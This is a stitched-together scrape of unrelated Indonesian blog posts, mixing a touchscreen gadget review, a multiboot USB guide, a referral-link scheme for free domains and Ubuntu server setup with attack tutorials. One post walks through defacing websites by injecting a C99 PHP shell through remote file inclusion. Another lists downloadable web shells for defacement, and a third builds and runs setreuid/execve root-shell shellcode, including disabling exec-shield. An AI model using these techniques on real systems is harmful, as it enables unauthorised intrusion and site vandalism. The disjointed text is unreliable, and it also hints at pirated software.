Kali ne gw mo bahas tentang cara Deface menggunakan Php Shell yaitu C99. Syarat wajib kalian musti punya script C99 yang dah terupload. Kalo lum pada punya, silahkan copy paste script DISINI.Simpan dalam format "txt". Silahkan upload di site kalian. Bisa cari yang gratis kek geocities or yang laen. Kalo maksa masih ga punya juga ya silahkan pake punya gw. Halah !! Paling pada make punya gw ne.. Dasar pada males !! Xixixixi….


OK..C99 nya dah siap. Sekarang kita cari bug (hole/lubang buat kita masuk ke server Target) nya. Gampang aja..Cari di Milw0rm. Cari yang "remote" yak… Kenapa ??? Coz mang kita mo masuk server target melalui remote (tidak melalui server target secara langsung). Cari yang "remote file inclusion" or "multiply remote file inclusion". Dah nemu kan ???? Masukkan dork nya di google or search engine kesayangan kalian. Terus ikuti langkah2 yang ada di bugnya. Biasanya sih suruh nambahin ja file inject (C99 dalam kasus ne) di belakang file yang vuln. Contoh "http://[site]/[path]/decoder/markdown.php?ccms_library_path=[File_C99]". Yang warna merah adalah Site target dan markdown.php?ccms_library_path= adalah file yang vuln beserta variablenya. Sedangkan [File_C99] adalah tempat dimana file C99 kita di upload. Jangan lupa tambahin "?" (tanda tanya, tanpa petik). Kenapa ?? Karena C99 tersebut sebenarnya adalah file PHP yang kita simpan sebagai file "txt".

Ok..gw kasih contoh ne…




Tuh kalo gw kek gitu..Kalian dah bisa lum ??? Ok kalo dah kita lanjot…Nah sekarang dah keliatan to isi servernya kek apa ? Silahkan jalan2 bentar di server orang..Xixixi…Dah jangan maen2 !! sekarang buruan cari folder yang full permission !!! Cirinya yang di samping kanan da tulisan ijo kek ginidwrxwrxwrx. Cari mpe ketemu…kalo ga da…Cari target yang laen ja. Coz di pastikan kalian ga bisa deface site tersebut. Key…kalo dah ketemu ayo lanjot ke step berikutnya !!! Klik Folder yang full permissionnya. Masuk kan…Nah kalian di folder tersebut bebas ngapain ja… Huzz jangan pada lompat2 gitu dunk !!! Senengnya minta ampun ik….Xixixixi….Nah..Langkah yang paling gampang buat deface adalah mengupload file Deface kalian ke server target. Di sebelah kanan bawah ada form "Upload". Nah…tinggal pilih file deface kalian trus Upload de…

Tunggu proses Upload mpe selese…Kalo dah, coba liat di list directorynya ada ga file kalian. Cuman mastiin kalo file kalian dah terupload dengan sukses. Ok…Sekarang liat dimana file deface kalian terupload. liat di active directory di bagian atas. Terus coba browse file file defacenya lewat browser. Misal active directorinya /home/portsaid/public_html/alfystudio/,berarti kalian musti browsing mengguanakan url www.alfystudio.com/file_deface_kalian.html. Dah kan..kaliatan ??? Xixixi..jadi Defacer deh kalian..Xixixi..Mantabb !!!! Ne kalo punya gw kek gini


Nah kira2 kek gitu de cara2 deface menggunakan Php Shell C99. Inget bro..kalo mo deface jangan merusak ya…. Kalo mo deface di main directory (www.target.com/), Jangan kalian hapus file index nya. Rename ja file Index nya dengan nama yang laen, terus rename file deface kalian dengan nama index.html. Key…Inget pesan Bapak !!!! Xixixixi….

OK de sekarang Time To Sleep… Bo2 dulu ya semua..Xixixi Ngantuk Berat ne.. Dah di tunggu cewe gw di mimpi…Xixixixi…Tungguin tulisan gw berikutnya yak tentang Bagaimana cara Mendapatkan password Admin di Site Target. Bubye !!!!!!!!!!!!!!




sumber : http://blackraptor.blogsome.com/2007/11/29/deface-step-by-step-with-php-shell-c99/
Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Tutorial Lengkap Mengedit File Flash SWF

Guyss.. Ane minta maaf nieh.. Di postingan blog sebelumnya, yang berjudul “Cara Mengedit File Flash Berekstensi SWF“, tutorialnya gak lengkap. Bahkan gak ada sama sekali.
Di postingan kali ini, ane dapet kabar dari temen, nama Blognya Und3rdark, and kayanya ane mesti banyak-banyak belajar dari dia juga nieh..
Gini Guys, untuk mengedit file SWF emang pake SWFModify. Tapi masih kurang, ada penambahan lagi.
Cara mengedit file SWF, ternyata tidak bisa langsung diedit.
Pertamaxx, kita harus merubah/convert menjadi .fla, kita dapat menggunakan software:
Sothink swf decompiler
Flash decompiler trilix
Keduaxx, kalo udah dicovert ke .fla, baru deh kita bisa operasi tuh ampela dari file SWF tadi.  Yang lebih tepatnya, mengubah Action Script nya. Kita dapat menggunakan menjadi .fla, kita dapat menggunakan software:
Adobe flash cs3 professional
Adobe flash cs4 professional
Nah, setelah proses pengeditan selesai, lalu publish/export/convert filenya sehingga extensi filenya akan kembali menjadi .swf dan siap digunakan.
Cat: semua software di atas bisa di Googling koq. Ato kalo kalian gak mau repot cari-cari crack ato Serial Number karena semua software diatas shareware,  kalian bisa cari di 4shared

Mempunyai monitor layar sentuh (touchscreen) memang idaman kami tetapi karena harganya yang mahal membuat kami selalu mengurungkan niat tersebut.
Tetapi sekarang, setidaknya ada satu solusi yang cukup murah untuk bisa menggunakan monitor layar sentuh (touchscreen).
Saya pun sangat berkeinginan memiliki alat ini,karna saya sendiri sering menjumpai monitor CRT ( tabung ) memiliki fitur layar sentuh,Bisanya terdapat di Loket antrian seperti PLN,Bank,dll

DUO for Monitor adalah alat yang dapat mengubah monitor LCD atau CRT (ukuran maksimal 22 inch)  anda menjadi sebuah layar sentuh dengan cara murah.

Alat ini cukup dipasang dibagian atas monitor dan menggunakan pen yang disertakan maka anda bisa menggunakan monitor tersebut sebagai monitor layar sentuh.

Dengan DUO, kita bisa melakukan banyak hal layaknya sebuah layar touchscreen atau sebuah Tablet PC, mulai dari "word recognition", "gesture recognition" dan masih banyak lagi.

DUO juga mengeluarkan model untuk digunakan di notebook sehingga notebook anda dapat berfungsi layaknya sebuah tablet PC. Dan bila sistim operasi yang digunakan adalah Windows Vista, bahkan anda tidak perlu lagi untuk menginstall softwarenya, cukup colokkan saja.



Nah, ini yang membuat kami ada harapan untuk mempunyai sebuah monitor layar sentuh yaitu harga DUO dijual dengan harga dibawah US$ 50.00.
Mungkin Artikel tentang Deface Website Menggunakan Shell Injection R57, C99, C99ud, Safe0ver, ByPass tidak berguna bagi para Master SEO karena Tips dan Trik yg ada di Blog Tutorial ini tidak lebih untuk Blogger Pemula. Mohon maaf bila secara sengaja atau tidak sengaja telah mengopy Artikel Deface Website Menggunakan Shell Injection R57, C99, C99ud, Safe0ver, ByPass atau mengambil Software Pak Boss tanpa ijin sebelumnya. Terima kasih atas kunjungan Pak Boss di Rahasia SEO Blog™ dan monggo di sedot artikel-nya sampai habis dibawah ini :
Banyak orang mencari cara deface website untuk berbagai tujuan. Ada yang murni ingin merusak website target, ada yang cuma ingin mencari bug untuk diinformasikan kepada pemilik website target (kali aja dapet imbalan yang pantas he...), ada yang karena benci pada pemilik website, tapi kebanyakan dari mereka cuma iseng.

Ada beberapa komponen yang akan dilibatkan dalam proses deface website ini. Komponen-komponen yang diperlukan untuk deface website ini beberapa diantaranya seperti yang disebutkan pada judul meliputi shell injection R57, C99, C99ud, Safe0ver dan bypass.

Download shell injection :

R57
C99
C99ud
Safe0ver
ByPass

Shell-shell injection di atas bisa digunakan untuk mengirimkan perintah-perintah ke hosting target. Bila kita sudah menemukan file bug dari hasil scan website target, maka kita bisa inject tuh file bug nya dengan salah satu script shell injection di atas.
Dual Boot atau Multi Boot system Operasi pada komputer sudah biasa, tapi dual boot atau multi boot pada flashdisk agaknya belum biasa karena yang sering kita temui adalah 1 Flasdisk ya berisi 1 OS saja itu pun  belum tentu semua orang memilikinya, maka pada tulisan saya kali ini akan membahas cara membuat Flashdisk menjadi Multi Boot yang berisi lebih dari satu system operasi pada Flashdisk yang Anda miliki, disini kita akan memnggunakan aplikasi MultiSystem.
1317305611214646828
Siapkan dulu Flashdisk yang lumayan agak besar kapasitasnya, backup data penting Anda yang berada di Flashdisk tersebut, format ulang Flashdisk Anda menjadi format FAT, karena disini saya memakai Distro BlankOn maka saya mempergunakan Aplikasi Disk Utility untuk distro lainnya silahkan sesuaikan sendiri.
Peringatan
Semua tulisan tutorial ini telah melalui uji coba dibeberapa komputer kami dan pada waktu pengujian tidak terjadi masalah, Apabila terjadi kerusakan Alat-alat, software, kehilangan data atau apapun sewaktu mempraktekkan isi dari Artikel, saya sebagai Penulis dengan segala hormat tidak bertanggung jawab dan tidak berhak untuk mengganti atas kerusakan tersebut, maka dari itu sangat disarankan terutama bagi pemula untuk berkonsultasi terlebih dulu dengan rekan Anda yang lebih berpengalaman dalam berkomputer. Atau demi kenyamanan Anda, kami sarankan untuk tidak mempraktekkan tulisan ini sama sekali atau silahkan backup data penting dikomputer Anda sebelum mempraktekkan tulisan ini. Jika Anda berada di Semarang bisa datang langsung ke tempat saya untuk praktek secara langsung.
Sebelum Anda mempraktekkan tutorial ini download aplikasi MultiSystem terlebih dulu  di: http://liveusb.info/dotclear/, atau jika kesulitan mencarinya dialamat tersebut silahkan unduh disini
setelah terunduh extrax dengan perintah
$ sudo tar zxf install-depot-multisystem.sh.tar.bz2
masukkan password root Anda, setelah itu jalankan file .sh yg ada di dalamnya
# ./install-depot-multisystem.sh
-
Setelah proses intall berhasil tanpa ada adanya masalah, jalankan Aplikasi MultiSystem lewat: Aplikasi >Aksesoris >MultySystem, lakukan pengaturan sesuai selera Anda, Tutorial lengkap cara pengaturan Aplikasi ini silahkan lihat di: http://imgos-belajarlinux.blogspot.com/
selamat Anda sudah berhasil membuat Flashdisk yang berisi lebih dari 1 OS yang bisa dijalankan secara live, sekarang lakukan uji coba pada PC/Laptop Anda dengan merubah urutan Booting pada BIOS, jadi kalau kita ingin menginstall suatu OS gak usah bawa beberapa Flashdisk bawa satu saja sudah cukup, sekarang tinggal dipamerin ke teman-teman atau siapa saja, dan bagi yang belum pernah tahu pasti akan tercengang,
Linux memang hebat….. keren….. dan bisa di Andalkan.
untuk Anda yang belum pernah pakai Linux, kasian deh…….. (XD)
Beberapa distro yang pernah saya coba diantaranya: Ubuntu, BlankOn, Parted Magic, BlankOn Sajadah, Knoppix dan OpenSUSE semua bejalan lancar
- Terimaksih


Sumber : http://imgos-belajarlinux.blogspot.com/
stackfilename
Seringkali shellcode terlihat dalam source code exploit berbentuk untaian kode-kode hexa. Sebenarnya apa itu shellcode dan apa makna di balik kode-kode hexa itu? Dalam artikel ini saya akan menjelaskan tentang shellcode dan kita juga akan praktek belajar membuat shellcode sendiri.
Shellcode, Exploit dan Vulnerability
Shellcode, exploit dan vulnerability adalah 3 saudara kandung. Semua berawal dari keteledoran sang  programmer sehingga programnya mengandung vulnerability yang bisa di-exploit untuk membuat program tersebut menjalankan code apapun yang diinginkan hacker (arbitrary code execution), code ini disebut dengan shellcode.
Dalam kondisi normal, program mengikuti instruksi yang dibuat oleh penciptanya (programmer). Hacker bisa membuat program mengikuti perintahnya dan mengabaikan perintah penciptanya dengan mengexploit vulnerability yang mengakibatkan arbitrary code execution

Kenapa disebut shellcode? Bila hacker bisa membuat program mengeksekusi code apapun yang dia mau, maka code apakah yang dipilihnya? Pilihan terbaik adalah code yang memberikan dia shell sehingga dia bisa memberi perintah lain yang dia mau dengan leluasa. Oleh karena itu code itu disebut shell-code.
Bila diibaratkan misile: exploit adalah misilnya, sedangkan shellcode adalah warhead yang bisa diisi dengan apa saja seperti bahan peledak, nuklir, senjata kimiawi atau senjata biologis terserah keinginan penyerang.
Walaupun umumnya shellcode memberikan shell, shellcode tidak selalu memberikan shell. Attacker bebas menentukan code apa yang akan dieksekusi di komputer korban. Shellcode bisa melakukan apa saja mulai dari menghapus file, memformat hardisk, mengirimkan data, menginstall program baru dsb terserah keinginan attacker.
Arbitrary Code Execution
Arbitrary code execution adalah kondisi dimana attacker dapat menginjeksi sembarang code/instruksi ke dalam suatu proses yang sedang running, kemudian code tersebut dieksekusi. Code yang diinjeksi itu disebut dengan shellcode. Code dalam shellcode adalah dalam bentuk bahasa mesin atau opcode. Biasanya opcode ini tidak dituliskan dalam nilai binary karena akan menjadi sangat panjang, melainkan memakai nilai hexa yang lebih kompak.
Antara Code dan Data
Sebenarnya code adalah data juga yang isinya adalah instruksi yang bisa dieksekusi komputer. Dalam memori, secara internal, data dan code tidak ada bedanya karena keduanya hanyalah untaian simbol 1 dan 0.
Saya beri contoh simple: Apakah nilai 50 hexa atau 01010000 binary di suatu lokasi memori adalah code atau data?
  • Bila 50 hexa dianggap sebagai data bertipe karakter, maka itu adalah kode ascii untuk huruf ‘P’.
  • Bila 50 hexa dianggap sebagai code, maka itu adalah instruksi PUSH EAX (dalam mode 32 bit) atau PUSH AX (dalam mode 16 bit).
Begitu juga dengan string “ABCD”, bisa dianggap sebagai data maupun code, perhatikan contoh di bawah ini:
1
2
3
4
5
6
7
8
9
10
11
12
$ perl -e 'print "ABCD"'|xxd
0000000: 4142 4344                                ABCD
$ perl -e 'print "ABCD"'|ndisasm -b 16 -
00000000  41                inc cx
00000001  42                inc dx
00000002  43                inc bx
00000003  44                inc sp
$ perl -e 'print "ABCD"'|ndisasm -b 32 -
00000000  41                inc ecx
00000001  42                inc edx
00000002  43                inc ebx
00000003  44                inc esp
Dalam contoh di atas ABCD secara internal disimpan sebagai 0×41, 0×42, 0×43 dan 0×44, yaitu kode ASCII dari karakter ‘A’,'B’,'C’,'D’ (lihat baris ke-2). Namun data yang sama bisa juga dianggap sebagai code 16 bit atau 32 bit seperti pada baris ke-4 s/d ke-7 untuk code 16 bit dan baris ke-9 s/d ke-12 untuk code 32 bit.
Sekarang pertanyaannya adalah kapan suatu data diperlakukan sebagai data dan kapan diperlakukan sebagai code? Jawabannya adalah ketika suatu data ditunjuk oleh instruction pointer, atau program counter yang biasanya ada pada register EIP (IP pada sistem 16 bit), maka data di lokasi itu adalah code yang akan dieksekusi.
Data apapun yang berada di lokasi memori yang alamatnya disimpan pada EIP akan dianggap sebagai code.
Sebagai demonstrasi, program kecil di bawah ini menunjukkan bahwa sebuah data bisa juga dianggap sebagai code bila ditunjuk oleh EIP.
1
2
3
4
5
6
7
#include <stdio.h>
char str[] = "ABCHIJK\xc3";
int main(void) {
        printf("%s\n",str); // str as argument of printf()
        ((void (*)(void))str)(); // str()
        return 0;
}
$ gcc codedata.c -o codedata
$ ./codedata
ABCHIJKÃ
Ada yang menarik dari program kecil di atas, yaitu pada variabel str yang berisi string ABCHIJK plus karakter berkode ASCII 0xc3. Pada baris ke-4, variabel str digunakan sebagai argument untuk fungsi printf(), dalam hal ini berarti str dianggap sebagai data. Sedangkan pada baris ke-5, str dipanggil seperti halnya fungsi, dalam hal ini str dianggap sebagai code. Perhatikan bahwa str sejatinya adalah bertipe pointer to char, namun bisa dipanggil seperti fungsi karena telah dicasting ke pointer to function dengan (void (*)(void)).
Dalam contoh di atas kita mengeksekusi code yang ada di variabel str, berarti kita mengeksekusi code yang berada di area data (bukan area code). Kernel sekarang banyak yang menerapkan proteksi sehingga kita tidak bisa mengeksekusi code yang tidak berada di area memori yang khusus untuk code. Dalam lingkungan windows, dikenal sebagai Data Execution Prevention, dan di Linux juga ada dikenal sebagai Exec-Shield.
Agar contoh dalam artikel ini bisa bekerja, anda harus mematikan Exec-Shield :
echo “0″ > /proc/sys/kernel/exec-shield
Perhatikan gambar di bawah ini. Gambar tersebut adalah hasil disassemble dengan gdb. Terlihat bahwa str terletak di lokasi 0×8049590. Pada <main+24> ada instruksi CALL yang merupakan pemanggilan fungsi printf() dengan str (0×8049590) sebagai argumen fungsi. Dalam hal ini berarti str dianggap sebagai data bertipe string. Namun pada <main+34> ada instruksi CALL ke lokasi str, hal ini berarti program akan lompat (jump) ke lokasi str dan mengeksekusi instruksi yang ada di lokasi str. Dalam hal ini berarti str dianggap sebagai code. Perhatikan pula bahwa pada str saya menambahkan \xc3 di akhir str karena \xc3 adalah opcode instruksi RET sehingga program akan kembali ke fungsi main dan melanjutkan fungsi main sampai selesai.
strascodeanddata
Mulai Membuat Shellcode
Sebenarnya isi variable str pada program di atas adalah shellcode, jadi sebenarnya kita sudah berhasil membuat shellcode pertama. Selamat! :) Namun shellcode yang kita buat tersebut tidak melakukan sesuatu yang berarti karena isinya hanya INC dan DEC kemudian RET. Namun dari contoh tersebut setidaknya kita sudah memahami bahwa shellcode tidak lain hanyalah string, yaitu kumpulan karakter yang juga merupakan opcode instruksi bahasa mesin.
Sekarang kita akan mulai membuat shellcode yang benar-benar spawn sebuah shell. sebelum membuat coba baca tentang belajar assembly . Shellcode yang akan kita buat berisi instruksi untuk memanggil system call. Perhatikan source bahasa C di bawah ini yang jika dieksekusi akan spawn shell.
1
2
3
4
5
6
7
#include <sys/types.h>
#include <unistd.h>
int main(void) {
        char* args[] = {"/bin/sh",NULL};
        setreuid(0,0);
        execve("/bin/sh",args,NULL);
}
Program di atas hanya memanggil system call setreuid() dan execve(). Shellcode yang akan kita buat juga akan melakukan hal yang sama seperti source di atas, bedanya hanya dibuat dalam assembly.
System Call setreuid()
setreuid() digunakan untuk mengeset userID real dan efektif. System call ini sangat penting sebab program yang memiliki SUID bit, biasanya men-drop root privilege bila sudah tidak dibutuhkan lagi. Oleh karena itu kita harus mengembalikan privilege itu sebelum spawn shell. Deklarasi system call setreuid() adalah:
int setreuid(uid_t ruid, uid_t euid);
ruid = real user id
euid = effective user id
Berdasarkan deklarasi system call tersebut, maka register yang harus diisi sebelum melakukan interrupt adalah:
  • EAX: 0×46 atau 70 (Nomor system call dari file unistd.h)
  • EBX: 0×0 (Parameter pertama, real uid yaitu 0)
  • ECX: 0×0 (Parameter kedua, effective uid yaitu 0)
Potongan assembly di bawah ini adalah instruksi untuk memanggil system call setreuid(0,0).
1
2
3
4
5
6
; setreuid(0,0)
xor eax,eax
mov al,0x46 ; EAX = 0x46
xor ebx,ebx  ; EBX = 0
xor ecx,ecx  ; ECX = 0
int 0x80
System Call execve()
Execve adalah system call untuk mengeksekusi suatu executable. Semua data, variable, heap, stack dsb milik proses yang memanggil execve akan hilang dan digantikan dengan program yang baru dieksekusi. Namun processID, dan open file handle (termasuk stdout,stdin,stderr) diwariskan ke program yang baru dieksekusi. Deklarasi system call execve adalah seperti di bawah ini:
int execve(const char *filename, char *const argv[],char *const envp[]);
Ada 3 argumen yang diperlukan, namun kita hanya akan memakai 2 argumen. Argumen envp kita isi dengan NULL karena kita tidak membutuhkan variabel environment. Berdasarkan deklarasi system call tersebut, maka register yang harus diisi sebelum memanggil interrupt adalah:
  • EAX: 0xb atau 11 (nomor system call)
  • EBX: alamat string “/bin/sh”
  • ECX: alamat array of string, {“/bin/sh”,NULL}
  • EDX: 0 karena envp diisi NULL.
Potongan assembly di bawah ini memanggil system call execve untuk mengeksekusi /bin/sh.
1
2
3
4
5
6
7
8
9
10
11
12
; execve("/bin/sh",{"/bin/sh",0x0},0x0)
xor eax,eax
push eax ; push 0x0
push 0x68732f2f ; push "//sh"
push 0x6e69622f ; push "/bin"
mov ebx,esp ; EBX = ESP = "/bin//sh\x0"
push eax ; push 0x0
push ebx ; push "/bin//sh\x0"
mov ecx,esp ; ECX = ESP = {"/bin//sh\x0",0x0}
xor edx,edx ; EDX = 0
mov al, 0xb ; EAX = 0xb
int 0x80
stackfilename
EBX harus diisi dengan address string berisi nama file executable yang akan dieksekusi. Kita gunakan stack untuk membuat string “/bin//sh” seperti pada gambar di atas. Dengan cara ini kita akan mendapatkan address string executable filename pada register ESP. Isi ESP ini kemudian disalin ke register EBX. Mungkin ada yang mengira ada kesalahan ketik dalam string tersebut, karena ada double slash sebelum “sh”. Ini bukan kesalahan ketik, namun sengaja agar pada saat push tepat mempush 4 byte (“//sh”), dan kelebihan satu slash tidak jadi masalah.

ECX harus diisi dengan array of string {“/bin//sh”,NULL}. Sekali lagi kita juga memakai stack dan register EBX yang sebelumnya sudah berisi address string “/bin//sh”. Pada gambar di atas pertama kita harus mempush NULL (0×0) ke dalam stack sebagai elemen array index ke-1, kemudian diikuti dengan mempush address string “/bin//sh” dari EBX sebagai elemen array index ke-0. Dengan cara ini ESP akan berisi address array of string {“/bin//sh”,NULL}. Nilai ESP inilah yang disalin ke register ECX.
Shellcode dalam Assembly
Mari kita gabungkan potongan-potongan assembly di atas untuk membentuk shellcode yang utuh seperti pada source code assembly di bawah ini.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
section .text
global _start
 
_start:
; setreuid(0,0)
xor eax,eax
mov al,0x46 ; EAX = 0x46
xor ebx,ebx  ; EBX = 0
xor ecx,ecx  ; ECX = 0
int 0x80
 
; execve("/bin/sh",{"/bin/sh",0x0},0x0)
xor eax,eax
push eax ; push 0x0
push 0x68732f2f ; push "//sh"
push 0x6e69622f ; push "/bin"
mov ebx,esp ; EBX = ESP = "/bin//sh\x0"
push eax ; push 0x0
push ebx ; push "/bin//sh\x0"
mov ecx,esp ; ECX = ESP = {"/bin//sh\x0",0x0}
xor edx,edx ; EDX = 0
mov al, 0xb ; EAX = 0xb
int 0x80
Mari kita compile dan link source assembly di atas.
1
2
3
4
5
6
7
8
9
10
$ nasm -f elf basicshellcode.asm
$ ld -o basicshellcode basicshellcode.o
$ sudo chown root:root basicshellcode;sudo chmod 4755 basicshellcode
Password:
$ ls -l basicshellcode
-rwsr-xr-x 1 root root 623 Dec  3 14:52 basicshellcode
$ ./basicshellcode
sh-3.2# whoami
root
sh-3.2# exit
Converting OBJDUMP Output to Shellcode
Hore berhasil! Sekarang tahap finishing, yaitu mengambil opcode dari program di atas. Kita gunakan objdump untuk ini.
$ objdump -M intel -d -j .text ./basicshellcode
 
./basicshellcode:     file format elf32-i386
 
Disassembly of section .text:
 
08048060 <_start>:
 8048060:       31 c0                   xor    eax,eax
 8048062:       b0 46                   mov    al,0x46
 8048064:       31 db                   xor    ebx,ebx
 8048066:       31 c9                   xor    ecx,ecx
 8048068:       cd 80                   int    0x80
 804806a:       31 c0                   xor    eax,eax
 804806c:       50                      push   eax
 804806d:       68 2f 2f 73 68          push   0x68732f2f
 8048072:       68 2f 62 69 6e          push   0x6e69622f
 8048077:       89 e3                   mov    ebx,esp
 8048079:       50                      push   eax
 804807a:       53                      push   ebx
 804807b:       89 e1                   mov    ecx,esp
 804807d:       31 d2                   xor    edx,edx
 804807f:       b0 0b                   mov    al,0xb
 8048081:       cd 80                   int    0x80
Dari output objdump di atas, kita hanya perlu mengambil opcode dalam kolom yang ditengah kemudian menggandengnya menjadi sebuah string. Untuk memudahkan mengambil opcode saya membuat script satu baris berikut:
$ objdump -d ./basicshellcode|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
Mari kita verifikasi sekali lagi dengan perl dan ndisasm.
$ perl -e 'print "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"' |ndisasm -u -
00000000  31C0              xor eax,eax
00000002  B046              mov al,0x46
00000004  31DB              xor ebx,ebx
00000006  31C9              xor ecx,ecx
00000008  CD80              int 0x80
0000000A  31C0              xor eax,eax
0000000C  50                push eax
0000000D  682F2F7368        push dword 0x68732f2f
00000012  682F62696E        push dword 0x6e69622f
00000017  89E3              mov ebx,esp
00000019  50                push eax
0000001A  53                push ebx
0000001B  89E1              mov ecx,esp
0000001D  31D2              xor edx,edx
0000001F  B00B              mov al,0xb
00000021  CD80              int 0x80
Hasilnya sama, berarti shellcode tersebut benar. Sekarang kita lanjutkan dengan mengeksekusi shellcode tersebut dengan program C di bawah ini:
1
2
3
4
5
6
7
char shellcode[] =
        "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0"
        "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
        "\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
int main() {
        ((void (*)(void))shellcode)(); // shellcode()
}
$ gcc shellcode4.c -o shellcode4
$ sudo chown root:root shellcode4; sudo chmod 4755 shellcode4
Password:
$ ls -l ./shellcode4
-rwsr-xr-x 1 root root 4748 Dec  3 16:25 ./shellcode4
$ ./shellcode4
sh-3.2# whoami
root
sh-3.2# exit
Oke, selamat kita telah berhasil membuat shellcode yang menghasilkan shell di local.


Sumber : http://pe-ha-ka.blogspot.com/
Cara Mendapatkan Domain .Com .Net Dan .Org Secara Gratis - Bagi Kalian yang Bingung memikirkan Nasib , Hadeh Gak punya Domain , Mau Beli Mahal , Hmm ..

Untuk Itu Saya Memberitahukan Cara Untuk Mendapatkan Domain Premium Seperti .Com .Net Dan .Org Secara Gratis , Benar-benar Gratis lho !!

Caranya Begini :

1. Daftarkan Diri Anda Ke Sini atau Klik Ini http://www.FreePremiumDomain.com/?r=440874
2. Setelah Anda Mengklik Link Ini Lalu Mendaftarkan Diri Anda .. Anda akan Diminta Untuk Mengundang Teman Anda Untuk Bergabung Ke Situs Tersebut , Namanya Referral
3. Jadi yang Harus Anda Lakukan Hanya Meminta Teman Anda Untuk Mendaftarkan Dirinya Ke Situs FreePremiumDomain.com , Contoh : Invite Teman Anda Dengan Menshare Link Ini http://www.FreePremiumDomain.com/?r=440874
4. Anda Hanya Perlu Menginvite 9 Orang Untuk Mendapatkan 1 Domain .Com .Net atau .Org Secara Gratis
5. Hati-Hati, Anda Jangan Mencoba Untuk Menipu, Mereka Memiliki Sistem Penipuan yang Sangat Maju , Apabila Anda Melakukan Kecurangan , Maka Anda akan Kehilangan Domain Anda Secara Otomatis
6. Selamat Mencoba

Sebagai Ucapan Terima Kasih , Saya Mohon Mendaftarkan Diri Anda Di Link Ini

 
 kali ini saya coba membuat tahapan dalam  instalasi ubuntu server 10.04 server…
Oke Kita langsung Coba Yupzz

Persiapan Instalasi
sebelum memulai instalasi ada baiknya kita melihat sesifikasi yang dmiliki si computer. Dan disesuaikan dengan kebutuhan dari si ubuntu server yang hendak kita installkan ini.                                                                                                                          

Kebutuhan Sistem
Ubuntu 10.04 LTS server edition mendukung 2 arsitektur umum yaitu intel x86 dan AMD64. Untuk instalasi ubuntu 10.04 server dibutuhkan RAM minimum 128 MByte dengan space harddisk yang akan digunakan sebesar 500 MBytes untuk base system dan keseluruhan paket terpasang sebesar 1GByte. Anda dapat mengatur lebih kecil dari yang disebutkan namun alangkah lebih baiknya jika lebih dari spesifikasi yang telah disebutkan.

Perbedaan Server dan Desktop
Terdapat beberapa perbedaan kecil antara versi server dengan versi desktop meskipun kedua versi ini menggunakan repository yang sama. Dengan demikian anda dapat memasang aplikasi server pada desktop seperti pada edisi server.
Prebedaan antara kedua edisi tersebut adalah tidak adanya lingkungan X Window pada edisi server, proses instalasi, dan pilihan kernel yang berbeda.
Perbedaan kernel:
  • Edisi server menggunakan Deadline I/O Scheduler bukan CFQ scheduler seperti yang digunakan pada edisi desktop
  • Preemption pada edisi server dimatikan
  • timer interrup adalah 100Hz sedangkan pada edisi desktop 250 Hz
catatan: Ketika anda memilih versi 64 bit dari ubuntu pada prosesor yang mendukung pengolahan 64 bit maka anda tidak dibatasi untuk penggunaan memori.
untuk melihat keseluruhan dari konfigurasi kernel yang digunakan anda dapat melihat isi dari /boot/config-2.6.31-server


Langkah Instalasi
Proses instalasi ubuntu server sebenarnya pada dasarnya sama saja dengan proses instalasi sistem operasi yang lainnya. Namun tidak seperti instalasi pada edisi desktop, edisi server tidak memiliki instalasi grafik tetapi menggunakan menu console.
Langkah langkahnya adalah :
1.                   Pastikan anda sudah memiliki media instalasi (CD, USB FD, atau HDD) yang sudah berisi installer Ubuntu server
2.                   Jika belum memilikinya anda dapat melakukan pengunduhan/download dari situs ini http://www.ubuntu.com/getubuntu/download
 atau langsung ke TKP http://cdimage.ubuntu.com/ubuntu-server/lucid/daily/current/ bisa juga minta  sama temen yang punya.

3.                     Jangan lupa Jalankan Komputer anda dan set 1st bootnya dari media instalasi yang anda gunakan, sehingga dapat melakukan proses booting ke media installasi
4.       Pada saat awal boot anda akan diminta untuk memilih bahasa yang akan digunakan
http://narzizz.files.wordpress.com/2011/03/selection_001.png?w=300&h=224
Tampilan saat boot
5.                     Berikutnya pilih menu instalasi pada langkah ini tentu saja pilih Install ….. Namun ada pilihan lain seperti UEC atau Ubuntu Enterprise Cloud
http://narzizz.files.wordpress.com/2011/03/ubuserv1-running-oracle-vm-virtualbox_006-e1299058153637.png?w=300&h=227
Pilih Install
6.                     Instalasi akan dimulai dengan pemilihan bahasa, lokasi, layout keyboard. Untuk mempercepat pilih untuk tidak mendeteksi layout keyboard dan gunakan layout keyboard USA kecuali anda menggunakan layout keyboard yang lain. Ingat tidak ada layout keyboard untuk indonesia (belum ada yang bikin)
http://narzizz.files.wordpress.com/2011/03/selection_007.png?w=504&h=378

Memilih Bahasa Instalasi

http://narzizz.files.wordpress.com/2011/03/selection_008.png?w=441&h=330
Memilih Lokasi Negara

http://narzizz.files.wordpress.com/2011/03/selection_009.png?w=441&h=332
Memilih Lokasi Asia

http://narzizz.files.wordpress.com/2011/03/selection_010.png?w=441&h=330
Pilih Negara
http://narzizz.files.wordpress.com/2011/03/selection_011.png?w=441&h=331

Pilih untuk tidak cek layout keyboard

http://narzizz.files.wordpress.com/2011/03/selection_012.png?w=441&h=331
Pilih USA untuk keyboard
http://narzizz.files.wordpress.com/2011/03/selection_013.png?w=441&h=330
Pilih lagi USA atau sesuaikan dengan keyboard anda

7.                     Langkah berikutnya adalah installer akan memeriksa konfigurasi hardware dan akan melakukan konfigurasi network dengan dhcp. Jika anda hendak menggunakan IP static maka segera tekan cancel dan pilih konfigurasi secara manual
http://narzizz.files.wordpress.com/2011/03/selection_015.png?w=441&h=330
Pilih Konfigurasi Manual
